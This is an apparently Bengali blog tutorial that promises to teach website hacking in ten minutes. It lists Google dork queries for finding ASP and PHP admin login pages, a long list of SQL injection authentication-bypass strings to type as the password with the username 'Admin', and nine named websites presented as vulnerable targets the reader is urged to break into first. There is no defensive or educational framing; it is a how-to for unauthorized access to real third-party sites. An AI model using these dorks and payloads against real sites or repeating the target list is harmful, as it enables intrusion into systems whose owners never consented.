মাত্র ১০ মিনিটে একটি ওয়েবসাইট হ্যাক করে সবাইকে দেখিয়ে দিন আপনিও হ্যাকার

আজ দেখাব মাত্র ১০ মিনিটে কিভাবে একটি ওয়েবসাইট হ্যাক করতে  হয়। আমার মনে হয় আপনি এই নিয়মটা শিখার জন্য অনেক আগ্রহী হয়ে বসে আছে।আসুন শিখে ফেলি কিভাবে ৫ মিনিটে একটা ওয়েবসাইট হ্যাকিং করতে হয়।

এই কাজটি আমরা authentication bypass পদ্ধতিতে এডমিন আইডি হ্যাকিং করব।  হ্যাকিং শুরু করুন।

প্রথমে আমরা যাব www.google.com এ।এবার Search বক্সে নিচের যে কোন একটি Google dork/sql injection লিখুন।আপনাদের সুবিধার্থে আমি sql injection কিছু দিয়ে দিলাম নিচে। link 

"inurl:admin.asp"  

"inurl:login/admin.asp"  

"inurl:admin/login.asp"

"inurl:adminlogin.asp"

"inurl:adminhome.asp"

 "inurl:admin_login.asp"

 "inurl:administratorlogin.asp"

"inurl:login/administrator.asp"

"inurl:administrator_login.asp"

"inurl: admin.php"

  "inurl: login/admin.php"

 "inurl: admin/login.php"

 "inurl: adminlogin.php"

 "inurl: adminhome.php"

 "inurl: admin_login.php"

 "inurl: administratorlogin.php"

 "inurl: login/administrator.php"

 "inurl: administrator_login.php"

এবার সার্চ দিন। তাহলে অনেক গুলো ফলাফল পাবেন।যে কোন একটি সাইটে প্রবেশ করুন। তাহলে সাইটটি আপনাকে নিচের মতো কিছু দেখাবে…

welcome to xxxxxxxxxx administrator panel

username :

password :

এখানে ইউজার নেম দিনঃ   Adminতাহলে পাসওয়ার্ড কি দিবেন ? নিচের থেকে যে কোন একটি দিন । নিচে কিছু sql injections দিলাম। এখান থেকে যে কোন একটি দিনঃ

' or '1'='1

' or 'x'='x

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

'or'1=1'

তাহলে আপনার লগইন স্ক্রীণ হবে এই রকম…

username:Admin

 password:'or'1'='1

এবার submit এ ক্লিক করুন।ব্যস কাজ শেষ আপনি এখন ঐ সাইট এর এডমিন । 

মনে রাখবেন, প্রত্যেকটি সাইট vulnerable নয়। যে সব সাইট vulnerable সেগুলোতে কাজ করবে।

নিচে কিছু vulnerable সাইট দিলাম যাতে কষ্ট করে আপনাকে গুগল এ খুজতে না হয় । তাহলে নিচের সাইট গুলা আগে হ্যাক করুনঃ

www.sunmarytrust.org/adminlogin.asp
www.arcvns.com/admin.asp
www.amskrupajal.org/AdminLogin.asp
www.quickwrench.com/Admin/adminlogin.asp
www.adyar.net/Adminlogin.asp
www.ringjordan.com/AdminLogin.asp
www.preventivecardiology.in/adminlogin.asp
www.udesa.co.za/admin/login.asp
www.railgourmet.com/admin/admin-login.asp

গুগল এ খুজলে আপনি হাজার হাজার vulnerable সাইট পাবেন ।
হ্যাকিং নিয়ে আরও অনেক কথা হবে ।